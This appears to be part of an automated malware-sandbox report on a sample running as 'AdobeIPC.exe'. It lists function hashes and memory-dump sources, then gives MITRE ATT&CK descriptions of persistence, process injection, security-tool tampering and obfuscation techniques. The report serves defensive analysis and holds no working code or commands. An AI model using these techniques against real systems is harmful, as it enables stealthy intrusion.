Instruction ID: ceac006b44d7613c14dff30c44c6adb86eba4214efd0d1f5e9bb6dba2e7999ab
Opcode Fuzzy Hash: f8263ec2a4603c214d49140fc976ee295febac94c45aa814bb60fa2b698900c8
Instruction Fuzzy Hash: B751FE20B0E6C94FD796ABB848746757FE5DF87219B0905FAE08DC71E7DD085806C386

Function 00007FFD9B7F1165 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd2c4d16a6ef4c482a6818f9f0a67f03550cfcc8c4c53a602b5649521dd55a1d
Instruction ID: 295060cf7e4c543cfb8bff78ece11278d563f4c57ce318a98a7e590186807693
Opcode Fuzzy Hash: bd2c4d16a6ef4c482a6818f9f0a67f03550cfcc8c4c53a602b5649521dd55a1d
Instruction Fuzzy Hash: 8241A026F0E79A4FD706E7A898B15E97FB0EF42214F0A42F6C099CB1F3DC1828058394

Function 00007FFD9B7F0C69 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bc3bffaab8839c7bcacb850b6467e5144d176f2459c76e7287063501b8d3286
Instruction ID: df33f746daf5dc533b20960b14b5e41511f234a4e3ec90268f77c29570dff091
Opcode Fuzzy Hash: 6bc3bffaab8839c7bcacb850b6467e5144d176f2459c76e7287063501b8d3286
Instruction Fuzzy Hash: 9B415D21B0D68A0FE356AB3C986567C77D1EF85314B4941FAD49CC72EBDD18AC428342

Function 00007FFD9B7F0570 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d30bde74d12ba83cc7ec79365cd26b21cae21d6227d184417693695a26cd9f8
Instruction ID: 82a5bf9b3d002a63749b1c1c6909b46de12141aea2fc3bdb2c155bb4d5f3f742
Opcode Fuzzy Hash: 8d30bde74d12ba83cc7ec79365cd26b21cae21d6227d184417693695a26cd9f8
Instruction Fuzzy Hash: C031A521B1C94D4FE798EE6C846A67976C2EF98305F4505BAF00EC72E7DD64AC428345

Function 00007FFD9B7F0AB9 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dbaebe2f3334fe7578bce0f4d005b03ec15f93f65e01f9b7de565611533e660
Instruction ID: 1e0bc9d40806cb3eeaab2c598a6460a8bd35471975926a1916fbbb695a4bb616
Opcode Fuzzy Hash: 4dbaebe2f3334fe7578bce0f4d005b03ec15f93f65e01f9b7de565611533e660
Instruction Fuzzy Hash: 9031DA21F1894A4FEB48BFBC48697BD77E1EF98705F0142BAE41CC32D6DE2858418792

Function 00007FFD9B7F0975 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1172db313e42c99c2c9a7b0b41be9add01557270dbed0c8a9cc1f884e142b285
Instruction ID: 401454b9776e3674e468a00963cf12fc995d246a96fd29c47df513b0f3aa6cd7
Opcode Fuzzy Hash: 1172db313e42c99c2c9a7b0b41be9add01557270dbed0c8a9cc1f884e142b285
Instruction Fuzzy Hash: E1316075B19A0D4FDB44EBA89465AEDB7A1EFD8310F8146B9D00DD32D6CD2869418780

Function 00007FFD9B7F0845 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01308d951bff9c52624df90733b8e37099f2c598e4aea566a53758aa789ac533
Instruction ID: dd1eb9100f7357dad30ae759d59561ab61dbb05343c2a42261cf547efb6318d0
Opcode Fuzzy Hash: 01308d951bff9c52624df90733b8e37099f2c598e4aea566a53758aa789ac533
Instruction Fuzzy Hash: 0031F679B4DA8D4FD345DB6894B5EA9BFB1EFC5200B8244E9D41CC33DBC92869418781

Function 00007FFD9B7F0807 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72bf3c3f3ddd9537135f8665c61cee51d7103c82b7ee09ab0fb25c36eb256992
Instruction ID: dc6ba85b44fcc96ea8fba1b1b601bc670dc29c7adb95df2092c36346a4af4fad
Opcode Fuzzy Hash: 72bf3c3f3ddd9537135f8665c61cee51d7103c82b7ee09ab0fb25c36eb256992
Instruction Fuzzy Hash: ED319379B49A8E4FD345EB6890A9DA9BFB1FFC5200B8245E9D41DC33DACD2869018781

Function 00007FFD9B7F2281 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1dd7320c2c1343af7fe8f8aa173112402a51e8a97c3d7a6ea353b60eda16f52
Instruction ID: 21033165f383e573ec27d599b2c9d4ef75cf33458ca56ac114942c1e7466a173
Opcode Fuzzy Hash: c1dd7320c2c1343af7fe8f8aa173112402a51e8a97c3d7a6ea353b60eda16f52
Instruction Fuzzy Hash: 17115921B0D7594FE751AB28A8518747FE0EF86220B0A02F6F88CC71B2D9186E4183C5

Analysis Process: AdobeIPC.exePID: 2424, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9B7E0EFA Relevance: 3.4, Strings: 2, Instructions: 857COMMON

Download Yara Rule

Strings

5N_^, xrefs: 00007FFD9B7E0F01
4N_^, xrefs: 00007FFD9B7E1001

Memory Dump Source

Source File: 00000014.00000002.2507914324.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b7e0000_AdobeIPC.jbxd

Similarity

API ID:
String ID: 4N_^$5N_^
API String ID: 0-1922742659
Opcode ID: e1c30b23ae1a5c391abbc6ed9c1de1d562a402936e6bb9c3d9b2239ce29b5f1d
Instruction ID: e594546384b3dab35312af7462cc177c105044a3cfbc2f58e32cde04f6d2de37
Opcode Fuzzy Hash: e1c30b23ae1a5c391abbc6ed9c1de1d562a402936e6bb9c3d9b2239ce29b5f1d
Instruction Fuzzy Hash: 05C11727F0D2A60BD715F7BCA8765ED7B60DF81369B1A82F7D19D8A0F3CC1824468291

Function 00007FFD9B7E16A9 Relevance: .9, Instructions: 861COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2507914324.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b7e0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c913c402ca39cb87fcda1db7becc7a493b01c054180dcf8b34b71098b267e91b
Instruction ID: 068bec7e0c941ed6ec4c795bf5544c630a62c3cee2132bd71b5acf59af05808d
Opcode Fuzzy Hash: c913c402ca39cb87fcda1db7becc7a493b01c054180dcf8b34b71098b267e91b
Instruction Fuzzy Hash: 2242F770B19A4D4FE798EB6C8476BB977D1FF98704F4106B9E05DC32E6DD28A8018781

Function 00007FFD9B7E20CD Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2507914324.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b7e0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592fc5767eab9dcc1b943470f76d9031343c386c9e5949d5bb33b3745cab4dc8
Instruction ID: 9d2c4ebbd59dee8632ef427627246c0612d7d657cde563fcc9a167f1a8722492
Opcode Fuzzy Hash: 592fc5767eab9dcc1b943470f76d9031343c386c9e5949d5bb33b3745cab4dc8
Instruction Fuzzy Hash: 1A51FE20B0E6C94FD79AABB848746657FE5DF8B219B0905FAE08DCB1F7DD185806C342

Function 00007FFD9B7E1165 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2507914324.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b7e0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d5f9aa242d8246e7cb549d8e2f4d9e4d4856bbc145e33c82552ba59c6004961
Instruction ID: 303cb4b76dca78df9ab7b0b55e97b7c10ded3491ab682db71b42f8283f84e5c1
Opcode Fuzzy Hash: 3d5f9aa242d8246e7cb549d8e2f4d9e4d4856bbc145e33c82552ba59c6004961
Instruction Fuzzy Hash: 5441C222A0E7DA0FD712E7B898B55E97BB0EF82254B0A41FBD199CB0F3DC1828058350

Function 00007FFD9B7E0C69 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2507914324.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b7e0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f08c9f2bb43f46b64411cdf7f9cddffac7f90fccd341af1ee7ccc4ea5a64cf
Instruction ID: 1873cfee4c288f5fe5bf8520ad29e44a2c3b3bf96366e6f8a4d999557136b77d
Opcode Fuzzy Hash: d4f08c9f2bb43f46b64411cdf7f9cddffac7f90fccd341af1ee7ccc4ea5a64cf
Instruction Fuzzy Hash: F5415921B1E68A0FE356EB38986667877D1EF85314B4941FAD49CC72FBDD18AC428342

Function 00007FFD9B7E0570 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2507914324.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b7e0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10bcb41ed7f7883e94c907569b989a22c028a43954fca930672c60864e71537
Instruction ID: 245975d86ff88b002656c7fa1aa5f990ca1fbc6275daa8e6b83c2863faebad99
Opcode Fuzzy Hash: b10bcb41ed7f7883e94c907569b989a22c028a43954fca930672c60864e71537
Instruction Fuzzy Hash: 1031A321B1C94D0FE798EE6C846A779B6C2EF98305F0505BEE04EC72E7DD64AC428341

Function 00007FFD9B7E0AB9 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2507914324.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b7e0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ea0da66aca66db6a7092d4beca4c2885a1d5e45ff019619084f12de9dcc11b
Instruction ID: 6b566ea04da4a3cceb5fb9fe7a0ddb1b73bd0c89bdbb52cb7a7f9143a2b2c4ba
Opcode Fuzzy Hash: 37ea0da66aca66db6a7092d4beca4c2885a1d5e45ff019619084f12de9dcc11b
Instruction Fuzzy Hash: 7B310C21F189494FEB44BBBC586A7BD77E1EF98705F0142BAE00DC31E7DE2858418392

Function 00007FFD9B7E0975 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2507914324.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b7e0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d95ee8d6ae0946dcfd3de0dfb915d6585a51242fb28b57d9c36098fb72e1499
Instruction ID: bbc3f0792acf749ba67eef1874c9aea8ae97be026c05d1a4981d0c33f4f89a45
Opcode Fuzzy Hash: 7d95ee8d6ae0946dcfd3de0dfb915d6585a51242fb28b57d9c36098fb72e1499
Instruction Fuzzy Hash: C231B334F18A0D4FDB44EBA8D465AEDB7B1FF98300F8146B5D119D32D6CE38A8418781

Function 00007FFD9B7E0825 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2507914324.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b7e0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80d6001df572fb7e1c356f1411b02875a5d0e54d80d751affc43bb80779961c5
Instruction ID: c3fb2e785badd767cf0facba6f123b8477bbf3b7f1b0c3dcf6ddd358d8946811
Opcode Fuzzy Hash: 80d6001df572fb7e1c356f1411b02875a5d0e54d80d751affc43bb80779961c5
Instruction Fuzzy Hash: DB31233874DA8D5FD304DB6894A4DAD7F61BFC520079146EAD928C73DBCD285902CBD2

Function 00007FFD9B7E2281 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2507914324.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b7e0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0b05c01e63abdf86d0c59e9c72ba1eae1e59c8371480e965d3c11e05f44e7b4
Instruction ID: 4f960770eeb7e1dacc5e29ca191330953ad165c3f724364db47f48c298f37337
Opcode Fuzzy Hash: c0b05c01e63abdf86d0c59e9c72ba1eae1e59c8371480e965d3c11e05f44e7b4
Instruction Fuzzy Hash: 2B114861B0DB990FE751A76CA8618757FE0DFD6260B0A06FAE888C71B7D9085A418391

Analysis Process: AdobeIPCPID: 7976, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B800EFA Relevance: 3.4, Strings: 2, Instructions: 856COMMON

Download Yara Rule

Strings

5L_^, xrefs: 00007FFD9B800F01
4L_^, xrefs: 00007FFD9B801001

Memory Dump Source

Source File: 00000016.00000002.2952629683.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_AdobeIPC.jbxd

Similarity

API ID:
String ID: 4L_^$5L_^
API String ID: 0-859531920
Opcode ID: abfc5a517c22295afbfc53789df232d94a8f8a7e68f1220fcfc4d005da96ee2f
Instruction ID: f6a751efe3ab77860d17d7b828de2b296d23402b3af5597027d202b2ea25c51f
Opcode Fuzzy Hash: abfc5a517c22295afbfc53789df232d94a8f8a7e68f1220fcfc4d005da96ee2f
Instruction Fuzzy Hash: 76C12727F0D6960AD715F7BCA8754ED3B70EF82379B0A81F7D1D98A0E3DD18244A8291

Function 00007FFD9B8016A9 Relevance: .9, Instructions: 860COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2952629683.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a55db6e2eedaab40a88a19945a530fa72ecbf6f67e25aa0d3adcc4a9f4dff31c
Instruction ID: 7d71e353dfbc0f726ffc33d2d06041cc7ea126fdb4355f303baf5774904acc1a
Opcode Fuzzy Hash: a55db6e2eedaab40a88a19945a530fa72ecbf6f67e25aa0d3adcc4a9f4dff31c
Instruction Fuzzy Hash: 3A42E431B29A4D4FE7A8FB6C8465ABD77D2FF99340F4105B9E05EC32D6DE28A8018741

Function 00007FFD9B8020CD Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2952629683.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d7e61a22a577ef1b05aa192daba3dfc95c81c8fac9205e57ed5e945867218e6
Instruction ID: a80562665da95509f07a6b9a6d483d022fde1ddc14cf80cd2ef058428c42103b
Opcode Fuzzy Hash: 2d7e61a22a577ef1b05aa192daba3dfc95c81c8fac9205e57ed5e945867218e6
Instruction Fuzzy Hash: 9C51DD20B0E6C94FD796ABB848746A57FE5DF8B219B0904FBE0C9C71E7DD586806C342

Function 00007FFD9B801165 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2952629683.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb7d4fd4ce1b7425e4fbb88ca2492bbdb92fb47aead7aa16e8b64495f4ce72c1
Instruction ID: 7fc548b61483bd4a3361a783c92c9455cfaf2ae6c6de320e120e95dbd8b44ede
Opcode Fuzzy Hash: eb7d4fd4ce1b7425e4fbb88ca2492bbdb92fb47aead7aa16e8b64495f4ce72c1
Instruction Fuzzy Hash: 62419F22E0E6DA4FD716E7A898B54E97FB0EF46264B0A40F7E0D9CB1E3DD1828058351

Function 00007FFD9B800C69 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2952629683.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107ff26161d514799d4b9936503c56487ef85b5a8de404749f89efb4b4ce73ae
Instruction ID: e5253013692561f93d889ea7cc9192d40fe523bc01c1e834a06062f1055ce965
Opcode Fuzzy Hash: 107ff26161d514799d4b9936503c56487ef85b5a8de404749f89efb4b4ce73ae
Instruction Fuzzy Hash: C2415E21B1D68E0FE356AB3C582567877D1EF89314B4941BAD48CC72DBDD18AC428342

Function 00007FFD9B800570 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2952629683.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d74f48c64028465dee28689c657745c30b8dc4f98697faf2130227809185ca36
Instruction ID: 3f032037a0bb89ec11a1bf5605096c9fc67fd5e8ab1e60b092e72e3b197ef6bf
Opcode Fuzzy Hash: d74f48c64028465dee28689c657745c30b8dc4f98697faf2130227809185ca36
Instruction Fuzzy Hash: 8D31A521B189494FE798EF6C84696B9B6C1EF9C355F0505BAE04EC32E7DD64AC428341

Function 00007FFD9B800AB9 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2952629683.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac49210991a565b01561a998a1972a2a6fb439cd358c1571be9c00b660afff6
Instruction ID: b6b49bed11db99e25f4b35d38d2cc22ea1beb1f7c24482b5d4bc16b9f14379da
Opcode Fuzzy Hash: cac49210991a565b01561a998a1972a2a6fb439cd358c1571be9c00b660afff6
Instruction Fuzzy Hash: 64310821F1894D4FE748BBBC48697BD77D2EF98745F0141BAE00CC32D6DE2868418392

Function 00007FFD9B800975 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2952629683.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75dbdff7eedd47bffe2529b648aed14e41a7f890745186c1519b9689ceee83b
Instruction ID: 98832726e75914fed8e82fd03c3765a62a2bab01c262ff5aa86e3432c3c0226f
Opcode Fuzzy Hash: e75dbdff7eedd47bffe2529b648aed14e41a7f890745186c1519b9689ceee83b
Instruction Fuzzy Hash: 9131A034F1890E4FDB44EBA8D865AEDBBB1FF88300F8145B5E059D3286DE38A9428741

Function 00007FFD9B800825 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2952629683.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d219ac30e38db94ce4f114078c6b1adb86354555ce454a9b1fc63d4e31e0a64
Instruction ID: c34da9a4ee64c97b4a21671d7c10ec9c39e5fa63ff99284e9b5de62fb000dfe0
Opcode Fuzzy Hash: 3d219ac30e38db94ce4f114078c6b1adb86354555ce454a9b1fc63d4e31e0a64
Instruction Fuzzy Hash: 82312330B1DA8D4FD704EB6894B48AE7F61BF8830074144E5E498873DBCE28AA12C751

Function 00007FFD9B802281 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2952629683.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5569c8f8055b0d8eeffaef328daa2e4d5b83394fb00c82f7373393ae93864df
Instruction ID: 92a37787982aa4b2f0cea81714a3715208642a4735526caa401b9af4921b0d59
Opcode Fuzzy Hash: d5569c8f8055b0d8eeffaef328daa2e4d5b83394fb00c82f7373393ae93864df
Instruction Fuzzy Hash: 31118C21B0D68A0FE741AB6CB8504B4BFE0DF8A360B0901F7F8CCC71A3D8485E518381

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

